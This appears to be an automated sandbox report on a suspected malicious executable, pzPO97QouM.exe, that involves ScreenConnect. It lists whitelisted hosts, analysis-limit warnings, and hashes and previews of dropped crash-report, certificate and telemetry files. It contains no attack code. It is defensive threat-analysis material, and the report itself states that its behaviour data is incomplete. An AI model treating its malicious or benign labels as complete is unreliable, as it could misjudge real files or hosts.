                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 20.190.159.23, 40.126.31.67, 20.190.159.73, 20.190.159.2, 20.190.159.0, 20.190.159.4, 40.126.31.73, 40.126.31.69, 20.42.65.92, 184.28.90.27, 192.229.221.95, 2.19.126.163, 2.19.126.137, 93.184.221.240
                                                                                                                                                      • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.afd.azureedge.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, cacerts.digicert.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, onedsblobprdeus17.eastus.cloudapp.azure.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.pr
                                                                                                                                                      • Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 2316 because it is empty
                                                                                                                                                      • Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 528 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                      • VT rate limit hit for: pzPO97QouM.exe
Time | Type | Description
11:55:49 | API Interceptor | 357238x Sleep call for process: dfsvc.exe modified
11:55:49 | API Interceptor | 1x Sleep call for process: pzPO97QouM.exe modified
11:55:51 | API Interceptor | 2x Sleep call for process: svchost.exe modified
11:55:57 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1310720
                                                                                                                                                                                                Entropy (8bit):0.49321398540234523
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1ZtaC:cJhXC9lHmutpJyiRDeJ/aUKrDgnmI
                                                                                                                                                                                                MD5:1D8AD7E19E2250864A7D68D2315B9B5D
                                                                                                                                                                                                SHA1:FC9CC0505BD1CF9D13E549CACED327536C0967EE
                                                                                                                                                                                                SHA-256:BFDD9DDD0F96502D0088788B7FB85B5ADC84299927DD184A4AFAE5F5E00309F5
                                                                                                                                                                                                SHA-512:36058E8ACF5F09622ED900BF487B38A8A9E2FB2061C447924E8D5147890C39CACB0B5F7DABF9D4009539AC8AD5C36A93AC2232C9E748968ABF0D1A4A9252DA3A
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0xe975223b, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1310720
                                                                                                                                                                                                Entropy (8bit):0.7217236883958209
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:LSB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSDVd:LazaNvFv8V2UW/DLzN/w4wZi
                                                                                                                                                                                                MD5:EDA2DA8A71197120EC4CA00C8E2D69E8
                                                                                                                                                                                                SHA1:2F27EB068EA71DEC1299BFA6D682483BB75AE1B8
                                                                                                                                                                                                SHA-256:5FD8CA3C351155FF96803E6A9CDF457AC40E8902027B52FDBB7D5649DDBD4120
                                                                                                                                                                                                SHA-512:7F57001CED3D6DD00CD9B936553882A2B2214A8BDC6D35F15EBE51D3118A5567EFE747AFF9D155258DBE2F3A3CA0BA35874F08F963B9E52623FE495E218C9C8C
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):16384
                                                                                                                                                                                                Entropy (8bit):0.08139942499116633
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:1Om1KYeh1uZ/ew/fgsCrZClW/tkVzvll+SHY/Xl+/rQLve:MyKzh1utewfgs3GQxAS4M
                                                                                                                                                                                                MD5:9537666BA45A3F11A5EB888A61795B61
                                                                                                                                                                                                SHA1:261B39B2A1EDAD575E985A6BD4D568544CB0BFA6
                                                                                                                                                                                                SHA-256:5E03E77B3144AF7D3E5B7EDB800CA254F9731A3E7F75C22F008E517E5239CF48
                                                                                                                                                                                                SHA-512:604B671C59B40646C3E6BEF363A1A95CD668594A927FF4282BB9617FDA8CD1952C50867B0738F80847775256976371AC95A275C76594BE79602A8BB9E4A355F5
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                                Entropy (8bit):0.9109370879161688
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:MdeFQYugGaswhqvGXyf8QXIDcQvc6QcEVcw3cE/jeq+HbHg/Jg+OgBCXEYcI+1ss:JXflsP0BU/Hezji0ozuiFDZ24IO8Sd
                                                                                                                                                                                                MD5:BF3C1F1EBBFE43DF9B59D644AA503571
                                                                                                                                                                                                SHA1:3910BC1BC05D887D9EBEC2E58747ED390A87DD94
                                                                                                                                                                                                SHA-256:240866836318EB19B2E4D8471E2F61D72C77E7458CF2066113DDC2062EBCB9AE
                                                                                                                                                                                                SHA-512:419F38A0D34FD5CF9994510616F5BFE17A7916E0B86AC1CA0EAD9354E529F79B1376F92B6420D23554C69CEBD26937AB93DEED5790192DA95C4F4360CBAA314A
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.4.7.2.1.5.0.7.0.3.8.5.1.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.4.7.2.1.5.2.2.9.7.6.0.6.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.a.2.e.6.3.0.c.-.3.4.8.5.-.4.6.3.2.-.a.c.f.6.-.c.f.5.a.7.6.4.e.6.3.2.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.a.e.5.b.b.9.3.-.d.9.3.b.-.4.2.6.3.-.a.b.c.e.-.a.a.9.7.f.d.1.3.d.5.b.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.p.z.P.O.9.7.Q.o.u.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.1.0.-.0.0.0.1.-.0.0.1.4.-.a.4.e.7.-.a.2.e.5.3.5.3.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.0.a.7.6.e.a.1.9.d.9.e.8.2.e.9.1.5.2.6.9.9.e.2.7.7.e.e.6.a.4.f.0.0.0.0.f.f.f.f.!.0.0.0.0.b.2.a.6.e.7.5.a.d.e.1.8.f.1.0.e.2.d.0.c.d.7.0.9.6.3.0.f.5.e.5.5.1.d.b.c.e.f.a.e.!.p.z.P.O.9.7.Q.o.u.M...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                File Type:Mini DuMP crash report, 14 streams, Thu Nov 7 16:55:52 2024, 0x1205a4 type
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):88200
                                                                                                                                                                                                Entropy (8bit):1.6331054417903996
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:192:8MoXg+4XkA0NeOhI/sFSj+w4Cr8lB3cDvUMld8XURSsH+tOZV627SQrZv/S5hj:joQ+thI/t+LlsvUgd8ES8KD2JpS5h
                                                                                                                                                                                                MD5:75D694C0FFB79CD4C5389BBC29C5CEAE
                                                                                                                                                                                                SHA1:848BA9D6467B028992CB62280C10BC9047D08CC3
                                                                                                                                                                                                SHA-256:751B43D49A974DE37B0A59C55FC05A94022D928E03BF65D24E96091F2C50955F
                                                                                                                                                                                                SHA-512:6CBF94693E5181E25CB10E5919797DB513F5CA1BE9296093C251634E471BC791578C0027EBFEA4D102F035869EFD2441D32075C3D06F1985A726020DFC093D4F
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:MDMP..a..... .........,g....................................T....>..........T.......8...........T............!...7..........P...........<...............................................................................eJ..............GenuineIntel............T.............,g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):8330
                                                                                                                                                                                                Entropy (8bit):3.6987443777247524
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:192:R6l7wVeJbW6N6YcDySU9TYgmfEtKprN89bBmsf8Lm:R6lXJa6N6Y1SU9TYgmfEt9BFfd
                                                                                                                                                                                                MD5:01D8CCAB7A27A1B85A9E690F463F7DD8
                                                                                                                                                                                                SHA1:36094EF792A709C84A43018E5A4CF991C70F5D4C
                                                                                                                                                                                                SHA-256:BFE1F483EE55A952D04E7B37CBC5358E9AAC9129B1AD32442A4E14057740D104
                                                                                                                                                                                                SHA-512:AA945DE2EA129F73AE85C5F99B51F902677F3F8CE7CDDC6BCED950155094EEC615027698605FCC4210C2EEFFB55E2AA9507B7893C896AC9076F0B3A767618344
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.4.0.<./.P.i.
                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):4593
                                                                                                                                                                                                Entropy (8bit):4.4790991886247005
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:cvIwWl8zsfJg77aI9BOWpW8VYLDYm8M4JQQLFK+q83s5LBwkexd:uIjfBI7Hv7V4WJQD55FVexd
                                                                                                                                                                                                MD5:C559AAAADCEBA62C591D506E51272CE2
                                                                                                                                                                                                SHA1:83CE3131B63BADD7AC7045E3059B1774D39FEA0B
                                                                                                                                                                                                SHA-256:56ABE82A10B68A68770B876AFC98117633AD6558C248E632C90411193D581877
                                                                                                                                                                                                SHA-512:1DA1F60B5893762C8EC93BF903F507ECE961AF6C0D0A3D61DBF3EA4177332D435EFBE6EDE09EFE83090C25DF0E6BA9404990AB4F53C115451C20E7F9BE220496
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="577918" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):81370
                                                                                                                                                                                                Entropy (8bit):3.074532452630099
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:q7hkocOgT3hs43MeYZN1hYH/+6YhnsbEidj17Ipq:q7hkocOgT3hs43MeYZN1hYH/+6UnsbEG
                                                                                                                                                                                                MD5:D9B8982930C6F29CDE5663D298561C39
                                                                                                                                                                                                SHA1:9BE3642A8A9A5EDB1348BD8DBE893D7B9A3BB910
                                                                                                                                                                                                SHA-256:B118D821DBA902B954055463D20703DED914003376B3E5533F0CE602174225A8
                                                                                                                                                                                                SHA-512:6FC0B5C88AEAA57AA7AC49B695B70BDB547EA693C5A12AF17568573F482A5723EEF88873FD7C981BFDF7237CBD50B6DD77EFD46AA8C70A6A3DB3AC781BFF3523
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):13340
                                                                                                                                                                                                Entropy (8bit):2.68383291058236
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:TiZYW8T1FYM0aY8ceYwWIHsYEZ0ZtaiA3NPSKwYy2/ag5F2MKSoJIlN3:2ZD2olapceZWFag5F2MKSo2lN3
                                                                                                                                                                                                MD5:D4F1C7334ADB2145C16E2137FFFBAB0B
                                                                                                                                                                                                SHA1:7F5378A9F0E75BA66468840F8BA0B58002FE02DE
                                                                                                                                                                                                SHA-256:F80B7B868423F583A9381600E93391ECBA3A0EC23A22C440CF49A063112C599F
                                                                                                                                                                                                SHA-512:F6AC4209A71F08E14E2C8F4C77D8322A71B5AEA240C54A111A8B8A196BA281E33E3052318DEFF59272A0C7A8D082E461F60C4139FA48DE6AFD88B55FE5BFE2E9
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):71954
                                                                                                                                                                                                Entropy (8bit):7.996617769952133
                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                                                MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                                                SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                                                SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                                                SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:Certificate, Version=3
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1716
                                                                                                                                                                                                Entropy (8bit):7.596259519827648
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                                                                                                MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                                                                                                SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                                                                                                SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                                                                                                SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):727
                                                                                                                                                                                                Entropy (8bit):7.591493461244967
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:12:5onfZGyc5RlRtBfQgyusAO+NEg3xO/MwGE2Mqyry/oUp2nWmyJQLYC0pH:5ikycdZNyuIJ/ZG7MqyryEnWNJQL8H
                                                                                                                                                                                                MD5:85E4EF53DAF9D74A4F483E3575E0182E
                                                                                                                                                                                                SHA1:706B05F30E9CA50CAA4D2AB06EEBDE684094F9F8
                                                                                                                                                                                                SHA-256:A155EDDD3FEFEB549E9A57DF0FE3910F7F66CF43E310DC81FC4A59E2E9529AF4
                                                                                                                                                                                                SHA-512:69E9854A575CE93964777B31CAEA6167A4291C57482BD342731BB02F04BE93450694A75C7BA019EAD54F38F25DFB96263111BA33A1DB57F77E25CF8EE681F007
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:Certificate, Version=3
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1428
                                                                                                                                                                                                Entropy (8bit):7.688784034406474
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                                                MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                                                SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                                                SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                                                SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):338
                                                                                                                                                                                                Entropy (8bit):3.443208365228831
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6:kKPtK8tMiJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:NKkckPlE99SCQl2DUevat
                                                                                                                                                                                                MD5:9611F78304C5EBE03FEDC65FCE17D7A4
                                                                                                                                                                                                SHA1:F0401358A7069DE2950567A7A3D419D9A90A80DD
                                                                                                                                                                                                SHA-256:C81B0C558B618146A920C6E53EEF1193E9611C97A7688CA50A00F89DFA78DA66
                                                                                                                                                                                                SHA-512:6753825A21D694017A0D8FAB0C36CE586B39D6E1A23ABFB1827E7857CB814EC0EB5B4FD222FC9AF51017282F2E29E127961BAE26B0A3AE3DF3406CBFB9AD2B17
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:p...... .............3..(...............................................8...1.. .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):328
                                                                                                                                                                                                Entropy (8bit):3.1188894571028145
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6:kKAEF9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:YdDnLNkPlE99SNxAhUe/3
                                                                                                                                                                                                MD5:019DF69AE73B0BD60B288E6218630568
                                                                                                                                                                                                SHA1:812A7008B37295D9E40CDBAE228B2EAF43DF7FA7
                                                                                                                                                                                                SHA-256:2AF0DBC8F275DADE9FBF7FC8981AF8E2191A1CE1934AEC8E4ECA2248BFEDB4C3
                                                                                                                                                                                                SHA-512:31B2DA8807D052210D1E051461F9D91316621D34A38C426A20C878FB85907FFB29AE439F86509968D6AE9B2F667244D1435276E5D51ED4548E2DF74AEE77E1DC
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:p...... ........je.c.1..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):308
                                                                                                                                                                                                Entropy (8bit):3.204200000804463
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6:kKtLnzNcalgRAOAUSW0P3PeXJUwh8lmi3Y:YtWOxSW0P3PeXJUZY
                                                                                                                                                                                                MD5:6474E5EE6634D032C1BC91EFFA03B47F
                                                                                                                                                                                                SHA1:68E93B36B6E16620F6DE4AAF5207A7FD2F768D18
                                                                                                                                                                                                SHA-256:0E87E72179C9FEE599B10A28A69AE969A443F00F1E566FCA0907590157C912B8
                                                                                                                                                                                                SHA-512:94523DBCA8C14899C6F61A1F10E6553713EE1152DAE234B2C5E10544EFC7BB01364073FE562F7B44BE31BC991483B4B3FAD6DB88FC3E495CDEEF7F55AF5E510E
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:p...... ........Wo..1..(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
